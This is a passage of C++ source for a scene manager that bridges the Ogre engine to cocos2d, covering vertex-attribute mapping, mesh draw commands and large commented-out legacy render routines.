                //mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
                //if (pTex->hasViewRelativeTextureCoordinateGeneration())
                //{
                //    mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
                //}
                //++unit;
                //GLES2BridgeTexture tex = pTex->_getTexturePtr();
                //cctextureId = tex->getGLID();
                //glBindTexture(GL_TEXTURE_2D, cctextureId);
            }
            /*// Sort out normalisation
            // Assume first world matrix representative - shaders that use multiple
            // matrices should control renormalisation themselves
            if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
                && mTempXform[0].hasScale())
                mDestRenderSystem->setNormaliseNormals(true);
            else
                mDestRenderSystem->setNormaliseNormals(false);
            // Sort out negative scaling
            // Assume first world matrix representative
            if (mFlipCullingOnNegativeScale)
            {
                CullingMode cullMode = mPassCullingMode;
                if (mTempXform[0].hasNegativeScale())
                {
                    switch (mPassCullingMode)
                    {
                    case CULL_CLOCKWISE:
                        cullMode = CULL_ANTICLOCKWISE;
                        break;
                    case CULL_ANTICLOCKWISE:
                        cullMode = CULL_CLOCKWISE;
                        break;
                    case CULL_NONE:
                        break;
                    };
                }
                // this also copes with returning from negative scale in previous render op
                // for same pass
                if (cullMode != mDestRenderSystem->_getCullingMode())
                    mDestRenderSystem->_setCullingMode(cullMode);
            }
            // Set up the solid / wireframe override
            // Precedence is Camera, Object, Material
            // Camera might not override object if not overrideable
            PolygonMode reqMode = pass->getPolygonMode();
            if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
            {
                PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
                // check camera detial only when render detail is overridable
                if (reqMode > camPolyMode)
                {
                    // only downgrade detail; if cam says wireframe we don't go up to solid
                    reqMode = camPolyMode;
                }
            }
            mDestRenderSystem->_setPolygonMode(reqMode);*/
            // optional light scissoring
            void* pBufferData = 0;
            // Walk the vertex declaration and hand each bound element to the
            // cocos2d program state as a vertex attribute pointer.
            const VertexDeclaration::VertexElementList& decl =
                ro.vertexData->vertexDeclaration->getElements();
            VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
            elemEnd = decl.end();
            for (elem = decl.begin(); elem != elemEnd; ++elem)
            {
                if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
                    continue; // skip unbound elements
                CHECK_GL_ERROR_DEBUG();;
                HardwareVertexBufferSharedPtr vertexBuffer =
                    ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
                GLuint bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
                vecGlBufferId = bufferId;
                //glBindBuffer(GL_ARRAY_BUFFER, bufferId);
                //_bindGLBuffer(GL_ARRAY_BUFFER,bufferId);
                // Attribute pointer is expressed as a byte offset into the VBO.
                pBufferData = ((char *)NULL + (elem->getOffset())) ;
                if (ro.vertexData->vertexStart)
                {
                    pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
                }
                GLenum type = 0;
                GLsizei size = 0;
                GLboolean normalised = GL_FALSE;
                const char* attribute_name = NULL;
                // Map the Ogre element type onto (GL type, component count).
                switch(elem->getType())
                {
                case VET_FLOAT1:
                    type = GL_FLOAT;
                    size = 1;
                    normalised = GL_FALSE;
                    break;
                case VET_FLOAT2:
                    type = GL_FLOAT;
                    size = 2;
                    normalised = GL_FALSE;
                    break;
                case VET_FLOAT3:
                    type = GL_FLOAT;
                    size = 3;
                    normalised = GL_FALSE;
                    break;
                case VET_FLOAT4:
                    type = GL_FLOAT;
                    size = 4;
                    normalised = GL_FALSE;
                    break;
                case VET_SHORT1:
                    type = GL_SHORT;
                    size = 1;
                    normalised = GL_FALSE;
                    break;
                case VET_SHORT2:
                    type = GL_SHORT;
                    size = 2;
                    normalised = GL_FALSE;
                    break;
                case VET_SHORT3:
                    type = GL_SHORT;
                    size = 3;
                    normalised = GL_FALSE;
                    break;
                case VET_SHORT4:
                    type = GL_SHORT;
                    size = 4;
                    normalised = GL_FALSE;
                    break;
                case VET_COLOUR:
                case VET_COLOUR_ABGR:
                case VET_COLOUR_ARGB:
                case VET_UBYTE4:
                    // Colours travel as four normalised unsigned bytes.
                    size = 4;
                    normalised = GL_TRUE;
                    type = GL_UNSIGNED_BYTE;
                    break;
                default:
                    break;
                };
                // Map the Ogre semantic onto the cocos2d attribute name.
                switch(elem->getSemantic())
                {
                case VES_POSITION:
                    attribute_name = GLProgram::ATTRIBUTE_NAME_POSITION;
                    break;
                case VES_BLEND_WEIGHTS:
                    attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_WEIGHT;
                    break;
                case VES_BLEND_INDICES:
                    attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_INDEX;
                    break;
                case VES_NORMAL:
                    attribute_name = GLProgram::ATTRIBUTE_NAME_NORMAL;
                    break;
                case VES_DIFFUSE:
                    attribute_name = GLProgram::ATTRIBUTE_NAME_COLOR;
                    break;
                //case VES_SPECULAR:
                //    break;
                case VES_TEXTURE_COORDINATES:
                    attribute_name = GLProgram::ATTRIBUTE_NAME_TEX_COORD;
                    break;
                //case VES_BINORMAL:
                //    break;
                //case VES_TANGENT:
                //    break;
                }
                //int type = GLES2HardwareBufferManager::getGLType(elem->getType());
                GLsizei stride = static_cast<GLsizei>(vertexBuffer->getVertexSize());
                programstate->setVertexAttribPointer(attribute_name,
                    size,
                    type,
                    normalised,
                    stride,
                    (GLvoid*)pBufferData
                    );
            }
            if (ro.useIndexes)
            {
                // Zero-initialized: the line fetching the real GL index
                // buffer id is commented out below, so bufferId would
                // otherwise be read uninitialized by cmd->init().
                GLuint bufferId = 0;
                //===GLuint bufferId = static_cast<GLES2HardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
                //glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
                pBufferData =((char *)NULL + (ro.indexData->indexStart *
                    ro.indexData->indexBuffer->getIndexSize())) ;
                cmd->init(1000, cctextureId, programstate, _blend,vecGlBufferId,bufferId,ro.operationType,ro.indexData->indexBuffer->getType(),ro.indexData->indexCount,*((cocos2d::Mat4*)mTempXform));
                //support tint and fade
                cmd->setDisplayColor(Vec4(1.0, 1.0, 1.0, 1.0));
                cmd->genMaterialID(cctextureId, programstate, vecGlBufferId, bufferId, _blend);
                cmd->setTransparent(true);
                //cmd->setDepthTestEnabled(false);
                //cmd->setDepthWriteEnabled(false);
                //cmd->preBatchDraw();
                //cmd->batchDraw();
                //cmd->postBatchDraw();
                //cmd->execute();
                render->addCommand(cmd);
                /* mDestRenderSystem->_setDepthBufferFunction(pass->getDepthFunction());
                mDestRenderSystem->_setDepthBufferCheckEnabled(pass->getDepthCheckEnabled());
                mDestRenderSystem->_setDepthBufferWriteEnabled(pass->getDepthWriteEnabled());
                mDestRenderSystem->_setDepthBias(pass->getDepthBiasConstant(),
                    pass->getDepthBiasSlopeScale());*/
                //_meshCommand.setTransparent(mesh->_isTransparent);
                /*
                programstate->applyGLProgram(*((cocos2d::Mat4*)mTempXform));
                programstate->applyUniforms();
                glBindBuffer(GL_ARRAY_BUFFER,vecGlBufferId);
                programstate->applyAttributes();
                glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
                glDrawElements(ro.operationType, ro.indexData->indexCount, indexType,pBufferData);
                CHECK_GL_ERROR_DEBUG();
                glBindBuffer(GL_ARRAY_BUFFER, 0);
                glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);
                CC_INCREMENT_GL_DRAWN_BATCHES_AND_VERTICES(1, 6);
                CHECK_GL_ERROR_DEBUG();
                // Update derived depth bias
                */
            }
        }
    }
}
// Post-frame hook; intentionally empty in this bridge.
void BridgeSceneManager::_afterRender()
{
}
// SceneManager type identifier; matches the factory's registered name.
const String& BridgeSceneManager::getTypeName(void) const
{
    return BridgeSceneManagerFactory::FACTORY_TYPE_NAME;
}
// Describes this factory to Ogre's scene-manager enumerator: generic scene
// type, no world-geometry support.
void BridgeSceneManagerFactory::initMetaData(void) const
{
    mMetaData.typeName = FACTORY_TYPE_NAME;
    mMetaData.description = "The bridge scene manager";
    mMetaData.sceneTypeMask = ST_GENERIC;
    mMetaData.worldGeometrySupported = false;
}
};
/*
//-----------------------------------------------------------------------
void BridgeSceneManager::renderSingleObject1(Renderable* rend, const Pass* pass,
bool lightScissoringClipping, bool doLightIteration,
const LightList* manualLightList)
{
return ;
unsigned short numMatrices;
RenderOperation ro;
OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
if (mShaderProgram)
{
mShaderProgram->use();
mShaderProgram->setUniformsForBuiltins(*((cocos2d::Mat4*)mTempXform));// rend->getCocosMatrix4()));
}
}
}
// Issue view / projection changes if any
useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
if (pass->isProgrammable())
{
// Tell auto params object about the renderable change
mAutoParamDataSource->setCurrentRenderable(rend);
// Tell auto params object about the world matrices, eliminated query from renderable again
mAutoParamDataSource->setWorldMatrices(mTempXform, numMatrices);
if (vprog)
{
passSurfaceAndLightParams = vprog->getPassSurfaceAndLightStates();
}
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->hasViewRelativeTextureCoordinateGeneration())
{
mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
}
++unit;
}
// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);
// no automatic light processing
{
// Even if manually driving lights, check light type passes
bool skipBecauseOfLightType = false;
if (pass->getRunOnlyForOneLightType())
{
if (!manualLightList ||
(manualLightList->size() == 1 &&
manualLightList->at(0)->getType() != pass->getOnlyLightType()))
{
skipBecauseOfLightType = true;
}
}
if (!skipBecauseOfLightType)
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, manualLightList, mSuppressRenderStateChanges);
// Do we need to update GPU program parameters?
if (pass->isProgrammable())
{
// Do we have a manual light list?
if (manualLightList)
{
useLightsGpuProgram(pass, manualLightList);
}
}
// Use manual lights if present, and not using vertex programs that don't use fixed pipeline
if (manualLightList &&
pass->getLightingEnabled() && passSurfaceAndLightParams)
{
useLights(*manualLightList, pass->getMaxSimultaneousLights());
}
// optional light scissoring
ClipResult scissored = CLIPPED_NONE;
ClipResult clipped = CLIPPED_NONE;
if (lightScissoringClipping && manualLightList && pass->getLightScissoringEnabled())
{
scissored = buildAndSetScissor(*manualLightList, mCameraInProgress);
}
if (lightScissoringClipping && manualLightList && pass->getLightClipPlanesEnabled())
{
clipped = buildAndSetLightClip(*manualLightList);
}
// don't bother rendering if clipped / scissored entirely
if (scissored != CLIPPED_ALL && clipped != CLIPPED_ALL)
{
// issue the render op
// nfz: set up multipass rendering
mDestRenderSystem->setCurrentPassIterationCount(pass->getPassIterationCount());
// Finalise GPU parameter bindings
updateGpuProgramParameters(pass);
if (rend->preRender(this, mDestRenderSystem))
{
mDestRenderSystem->_render(ro);
}
rend->postRender(this, mDestRenderSystem);
}
if (scissored == CLIPPED_SOME)
resetScissor();
if (clipped == CLIPPED_SOME)
resetLightClip();
} // !skipBecauseOfLightType
}
}
else // mSuppressRenderStateChanges
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, NULL, mSuppressRenderStateChanges);
// Just render
mDestRenderSystem->setCurrentPassIterationCount(1);
if (rend->preRender(this, mDestRenderSystem))
mDestRenderSystem->_render(ro);
rend->postRender(this, mDestRenderSystem);
}
// Reset view / projection changes if any
resetViewProjMode(passTransformState);
OgreProfileEndGPUEvent("Material: " + pass->getParent()->getParent()->getName());
}
//-----------------------------------------------------------------------
void BridgeSceneManager::renderSingleObject(Renderable* rend, const Pass* pass,
bool lightScissoringClipping, bool doLightIteration,
const LightList* manualLightList)
{
unsigned short numMatrices;
RenderOperation ro;
OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
if (mShaderProgram)
{
mShaderProgram->use();
mShaderProgram->setUniformsForBuiltins(*((cocos2d::Mat4*)mTempXform));// rend->getCocosMatrix4()));
}
}
}
// Issue view / projection changes if any
useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
if (pass->isProgrammable())
{
// Tell auto params object about the renderable change
mAutoParamDataSource->setCurrentRenderable(rend);
// Tell auto params object about the world matrices, eliminated query from renderable again
mAutoParamDataSource->setWorldMatrices(mTempXform, numMatrices);
if (vprog)
{
passSurfaceAndLightParams = vprog->getPassSurfaceAndLightStates();
}
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->hasViewRelativeTextureCoordinateGeneration())
{
mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
}
++unit;
}
// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);
// no automatic light processing
{
// Even if manually driving lights, check light type passes
bool skipBecauseOfLightType = false;
if (pass->getRunOnlyForOneLightType())
{
if (!manualLightList ||
(manualLightList->size() == 1 &&
manualLightList->at(0)->getType() != pass->getOnlyLightType()))
{
skipBecauseOfLightType = true;
}
}
if (!skipBecauseOfLightType)
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, manualLightList, mSuppressRenderStateChanges);
// Do we need to update GPU program parameters?
if (pass->isProgrammable())
{
// Do we have a manual light list?
if (manualLightList)
{
useLightsGpuProgram(pass, manualLightList);
}
}
// Use manual lights if present, and not using vertex programs that don't use fixed pipeline
if (manualLightList &&
pass->getLightingEnabled() && passSurfaceAndLightParams)
{
useLights(*manualLightList, pass->getMaxSimultaneousLights());
}
// optional light scissoring
ClipResult scissored = CLIPPED_NONE;
ClipResult clipped = CLIPPED_NONE;
if (lightScissoringClipping && manualLightList && pass->getLightScissoringEnabled())
{
scissored = buildAndSetScissor(*manualLightList, mCameraInProgress);
}
if (lightScissoringClipping && manualLightList && pass->getLightClipPlanesEnabled())
{
clipped = buildAndSetLightClip(*manualLightList);
}
// don't bother rendering if clipped / scissored entirely
if (scissored != CLIPPED_ALL && clipped != CLIPPED_ALL)
{
// issue the render op
// nfz: set up multipass rendering
mDestRenderSystem->setCurrentPassIterationCount(pass->getPassIterationCount());
// Finalise GPU parameter bindings
updateGpuProgramParameters(pass);
if (rend->preRender(this, mDestRenderSystem))
{
//mDestRenderSystem->_render(ro);
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();;
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
GLuint bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
glBindBuffer(GL_ARRAY_BUFFER, bufferId);
//_bindGLBuffer(GL_ARRAY_BUFFER,bufferId);
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
VertexElementSemantic sem = elem->getSemantic();
unsigned short typeCount = VertexElement::getTypeCount(elem->getType());
GLboolean normalised = GL_FALSE;
bool multitexturing = false;//(getCapabilities()->getNumTextureUnits() > 1);
bool isCustomAttrib = false;
GLuint attrib = 0;
switch (elem->getType())
{
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
// Because GL takes these as a sequence of single unsigned bytes, count needs to be 4
// VertexElement::getTypeCount treats them as 1 (RGBA)
// Also need to normalise the fixed-point data
typeCount = 4;
normalised = GL_TRUE;
break;
default:
break;
};
if (!isCustomAttrib)
{
// fixed-function & builtin attribute support
switch (sem)
{
case VES_POSITION:
attrib = 0;
break;
//case VES_NORMAL:
// break;
case VES_DIFFUSE:
attrib = 1;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attrib = 2;
break;
default:
attrib = 12;
break;
};
}
int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei size = static_cast<GLsizei>(vertexBuffer->getVertexSize());
CHECK_GL_ERROR_DEBUG();
glVertexAttribPointer(attrib,
typeCount,
type,
normalised,
size,
pBufferData);
CHECK_GL_ERROR_DEBUG();;
}
// Find the correct type to render
GLint primType;
switch (ro.operationType)
{
case RenderOperation::OT_POINT_LIST:
primType = GL_POINTS;
break;
case RenderOperation::OT_LINE_LIST:
primType = GL_LINES;
break;
case RenderOperation::OT_LINE_STRIP:
primType = GL_LINE_STRIP;
break;
default:
case RenderOperation::OT_TRIANGLE_LIST:
primType = GL_TRIANGLES;
break;
case RenderOperation::OT_TRIANGLE_STRIP:
primType = GL_TRIANGLE_STRIP;
break;
case RenderOperation::OT_TRIANGLE_FAN:
primType = GL_TRIANGLE_FAN;
break;
}
if (ro.useIndexes)
{
GLuint bufferId = static_cast<GLES2HardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
pBufferData =((char *)NULL + (ro.indexData->indexStart *
ro.indexData->indexBuffer->getIndexSize())) ;
GLenum indexType = (ro.indexData->indexBuffer->getType() == HardwareIndexBuffer::IT_16BIT) ? GL_UNSIGNED_SHORT : GL_UNSIGNED_INT;
// Update derived depth bias
CHECK_GL_ERROR_DEBUG();;
GLenum primitive = primType ;
glDrawElements(primitive, ro.indexData->indexCount, indexType, pBufferData);
CHECK_GL_ERROR_DEBUG();;
}
}
rend->postRender(this, mDestRenderSystem);
}
if (scissored == CLIPPED_SOME)
resetScissor();
if (clipped == CLIPPED_SOME)
resetLightClip();
} // !skipBecauseOfLightType
}
}
else // mSuppressRenderStateChanges
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, NULL, mSuppressRenderStateChanges);
// Just render
mDestRenderSystem->setCurrentPassIterationCount(1);
if (rend->preRender(this, mDestRenderSystem))
{
mDestRenderSystem->_render(ro);
}
rend->postRender(this, mDestRenderSystem);
}
// Reset view / projection changes if any
resetViewProjMode(passTransformState);
OgreProfileEndGPUEvent("Material: " + pass->getParent()->getParent()->getName());
}
void BridgeSceneManager::_render11()
{
return ;
if (mShaderProgram && mRenderQueue)
{
mShaderProgram->use();
auto getBlend = [](int ogreBlend)
{
switch (ogreBlend)
{
case SBF_ONE:
return GL_ONE;
case SBF_ZERO:
return GL_ZERO;
case SBF_DEST_COLOUR:
return GL_DST_COLOR;
case SBF_SOURCE_COLOUR:
return GL_SRC_COLOR;
case SBF_ONE_MINUS_DEST_COLOUR:
return GL_ONE_MINUS_DST_COLOR;
case SBF_ONE_MINUS_SOURCE_COLOUR:
return GL_ONE_MINUS_SRC_COLOR;
case SBF_DEST_ALPHA:
return GL_DST_ALPHA;
case SBF_SOURCE_ALPHA:
return GL_SRC_ALPHA;
case SBF_ONE_MINUS_DEST_ALPHA:
return GL_ONE_MINUS_DST_ALPHA;
case SBF_ONE_MINUS_SOURCE_ALPHA:
return GL_ONE_MINUS_SRC_ALPHA;
};
return GL_ONE;
};
for(auto obj : mBridgeRenderQueue->mTransparentRenderable)
{
// Give SM a chance to eliminate
GLenum sourceBlend = getBlend(obj.pass->getSourceBlendFactor());
GLenum destBlend = getBlend(obj.pass->getDestBlendFactor());
const Pass *pass = obj.pass;
Renderable *rend = obj.renderable;
CHECK_GL_ERROR_DEBUG();;
if(pass->getSourceBlendFactor() == SBF_ONE && pass->getDestBlendFactor() == SBF_ZERO)
{
glDisable(GL_BLEND);
CHECK_GL_ERROR_DEBUG();;
}
else
{
glEnable(GL_BLEND);
CHECK_GL_ERROR_DEBUG();;
glBlendFunc(sourceBlend, destBlend);
CHECK_GL_ERROR_DEBUG();;
}
GLint func = GL_FUNC_ADD;
switch(pass->getSceneBlendingOperation())
{
case SBO_ADD:
func = GL_FUNC_ADD;
break;
case SBO_SUBTRACT:
func = GL_FUNC_SUBTRACT;
break;
case SBO_REVERSE_SUBTRACT:
func = GL_FUNC_REVERSE_SUBTRACT;
break;
case SBO_MIN:
#if GL_EXT_blend_minmax
func = GL_MIN_EXT;
#endif
break;
case SBO_MAX:
#if GL_EXT_blend_minmax
func = GL_MAX_EXT;
#endif
break;
}
glBlendEquation(func);
CHECK_GL_ERROR_DEBUG();;
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
// Reset the shadow texture index for each pass
while(texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->getContentType() == TextureUnitState::CONTENT_COMPOSITOR)
{
CompositorChain* currentChain = _getActiveCompositorChain();
if (!currentChain)
{
OGRE_EXCEPT(Exception::ERR_INVALID_STATE,
"A pass that wishes to reference a compositor texture "
"attempted to render in a pipeline without a compositor",
"SceneManager::_setPass");
}
CompositorInstance* refComp = currentChain->getCompositor(pTex->getReferencedCompositorName());
if (refComp == 0)
{
OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
"Invalid compositor content_type compositor name",
"SceneManager::_setPass");
}
Ogre::TexturePtr refTex = refComp->getTextureInstance(
pTex->getReferencedTextureName(), pTex->getReferencedMRTIndex());
if (refTex.isNull())
{
OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
"Invalid compositor content_type texture name",
"SceneManager::_setPass");
}
pTex->_setTexturePtr(refTex);
}
//mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
++unit;
}
// Disable remaining texture units
mDestRenderSystem->_disableTextureUnitsFrom(pass->getNumTextureUnitStates());
// Culling mode
if (isShadowTechniqueTextureBased()
&& mIlluminationStage == IRS_RENDER_TO_TEXTURE
&& mShadowCasterRenderBackFaces
&& pass->getCullingMode() == CULL_CLOCKWISE)
{
// render back faces into shadow caster, can help with depth comparison
mPassCullingMode = CULL_ANTICLOCKWISE;
}
else
{
mPassCullingMode = pass->getCullingMode();
}
//mDestRenderSystem->_setCullingMode(mPassCullingMode);
GLenum cullMode;
switch( mPassCullingMode )
{
case CULL_NONE:
glDisable(GL_CULL_FACE);
CHECK_GL_ERROR_DEBUG();;
default:
case CULL_CLOCKWISE:
cullMode = GL_BACK;
break;
case CULL_ANTICLOCKWISE:
cullMode = GL_BACK;
break;
}
glEnable(GL_CULL_FACE);
CHECK_GL_ERROR_DEBUG();;
glCullFace(cullMode);
CHECK_GL_ERROR_DEBUG();;
GLenum mPolygonMode;
switch(pass->getPolygonMode())
{
case PM_POINTS:
mPolygonMode = GL_POINTS;
break;
case PM_WIREFRAME:
mPolygonMode = GL_LINE_STRIP;
break;
default:
case PM_SOLID:
mPolygonMode = GL_FILL;
break;
}
//==================renderSingleObject(obj.renderable,obj.pass,true,true,NULL);
auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
auto programstate = cocos2d::GLProgramState::create(glProgram);
//this->setGLProgram(GLProgramCache::getInstance()->getGLProgram(GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR));
unsigned short numMatrices;
RenderOperation ro;
OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
}
if (mShaderProgram)
{
mShaderProgram->use();
//mShaderProgram->setUniformsForBuiltins(*((cocos2d::Mat4*)mTempXform));// rend->getCocosMatrix4()));
}
}
// Issue view / projection changes if any
useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
int cctextureId;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
if (pTex->hasViewRelativeTextureCoordinateGeneration())
{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
}
++unit;
GLES2BridgeTexture tex = pTex->_getTexturePtr();
cctextureId = tex->getGLID();
